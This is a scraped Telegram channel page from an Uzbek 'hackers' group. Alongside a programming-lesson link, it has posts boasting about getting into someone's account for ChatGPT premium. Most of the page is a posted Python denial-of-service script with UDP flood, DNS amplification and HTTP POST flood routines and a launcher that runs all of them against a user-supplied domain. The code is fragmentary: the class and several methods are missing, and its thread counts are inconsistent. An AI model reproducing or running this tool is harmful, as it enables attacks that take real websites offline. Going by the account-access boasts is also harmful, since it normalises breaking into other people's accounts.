es
Feedback
𝑯𝒂𝒄𝒌𝒆𝒓𝒍𝒂𝒓☠️

𝑯𝒂𝒄𝒌𝒆𝒓𝒍𝒂𝒓☠️

Ir al canal en Telegram

Salom hammga bu kanalda siz har xil turdagi videolarni topasiz. Bizning @UzbeHackers jamoasi bilan dasturlashni osongina urganing

Mostrar más
594
Suscriptores
+124 horas
+27 días
-1330 días
Archivo de publicaciones
WORD DARSLARI 👇

ℹ️ Kotlin dasturlash tili | 1- dars Kotlin dasturlash tiliga kirish, JDK va Intellij IDEA ni o'rnatish.

Qoldan kelgancha xarakat qildim acc pz omadsiz ekan yoki internetim ultra sekin ishladi 🗿

simplescreenrecorder-2025-12-25_18.31.02.mkv57.83 MB

@eshoonov acc kirib Chatgpt premium versiyasi olindi

bugun 18 00 jonli chatda kim kop emile tashlasa oshanga olib beraman prem ni bepulga

Chatgpt bepulga 1 yilik obuna oldim
Chatgpt bepulga 1 yilik obuna oldim

ddos attac ishlatish 😈

kerakli kutib xonalar

DDOSATTACK.py0.08 KB



def main():
    print("""
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗    ██╗   ██╗███████╗
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝    ██║   ██║╚══███╔╝
    ███████║███████║██║     █████╔╝     ██║   ██║  ███╔╝ 
    ██╔══██║██╔══██║██║     ██╔═██╗     ██║   ██║ ███╔╝  
    ██║  ██║██║  ██║╚██████╗██║  ██╗    ╚██████╔╝███████╗
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝     ╚═════╝ ╚══════╝
    """)
    
    target = input("Nishon sayt domenini kiriting (masalan: example.com): ").strip()
    
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    
    print(f"\n[!] TOTAL WAR hujumi boshlanmoqda: {target}")
    print("[!] To'xtatish uchun Ctrl+C bosing")
    
    attack = AdvancedDDoSAttack()
    
    try:
        attack.total_war_attack(target)
    except KeyboardInterrupt:
        print(f"\n\n[!] Hujum to'xtatildi")
        print(f"[+] Jami yuborilgan so'rovlar: {attack.attack_count}")

if __name__ == "__main__":
    main()



    # 4. UDP FLOOD
    def udp_flood(self, target_ip, target_port=80, num_threads=2000000):
        print(f"[+] UDP Flood boshlanmoqda: {target_ip}:{target_port} - {num_threads} thread")
        
        def send_udp():
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                data = random._urandom(1024)
                while True:
                    s.sendto(data, (target_ip, target_port))
                    self.attack_count += 1
            except:
                pass
        
        for _ in range(num_threads):
            threading.Thread(target=send_udp, daemon=True).start()

    # 5. DNS AMPLIFICATION (tuzatilgan)
    def dns_amplification(self, target_ip, num_threads=1000000):
        print(f"[+] DNS Amplification boshlanmoqda: {target_ip} - {num_threads} thread")
        
        def attack():
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                # To'g'ri DNS so'rovi
                query = b'\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00' + \
                        b'\x07example\x03com\x00\x00\x01\x00\x01'
                while True:
                    s.sendto(query, (target_ip, 53))
                    self.attack_count += 1
            except:
                pass
        
        for _ in range(num_threads):
            threading.Thread(target=attack, daemon=True).start()

    # 6. HTTP POST FLOOD
    def http_post_flood(self, target, num_threads=15000000):
        print(f"[+] HTTP POST Flood boshlanmoqda: {target} - {num_threads} thread")
        
        def post_attack():
            while True:
                try:
                    headers = {
                        'User-Agent': random.choice(self.user_agents),
                        'Content-Type': 'application/json'
                    }
                    
                    big_data = {'payload': ''.join(random.choices('abcdefghijklmnopqrstuvwxyz', k=1000999))}
                    requests.post(target, json=big_data, headers=headers, verify=False, timeout=1)
                    self.attack_count += 1
                except:
                    pass
        
        for _ in range(num_threads):
            threading.Thread(target=post_attack, daemon=True).start()

    # BARCHA HUJUMLARNI BIR VAQTDA ISHGA TUSHIRISH
    def total_war_attack(self, target):
        print(f"\n[!] TOTAL WAR HUJUMI BOSHLANMOQDA: {target}")
        
        try:
            target_ip = socket.gethostbyname(target.replace('http://', '').replace('https://', '').split('/')[0])
        except:
            target_ip = target.replace('http://', '').replace('https://', '').split('/')[0]

        # BARCHA HUJUM TURLARINI ISHGA TUSHIRISH
        attacks = [
            lambda: self.http_flood(target, 30000, 12000),
            lambda: self.tcp_syn_flood(target_ip, 80, 20000),
            lambda: self.slowloris_attack(target, 10000),
            lambda: self.udp_flood(target_ip, 80, 150000),
            lambda: self.dns_amplification(target_ip, 80),
            lambda: self.http_post_flood(target, 100000)
        ]

        for attack in attacks:
            threading.Thread(target=attack, daemon=True).start()
        
        print("[+] Barcha hujumlar muvaffaqiyatli ishga tushirildi!")
        print(f"[+] Jami: 930+ thread/socket faol")
        
        while True:
            print(f"\r[+] Yuborilgan so'rovlar: {self.attack_count}", end="", flush=True)
            time.sleep(1)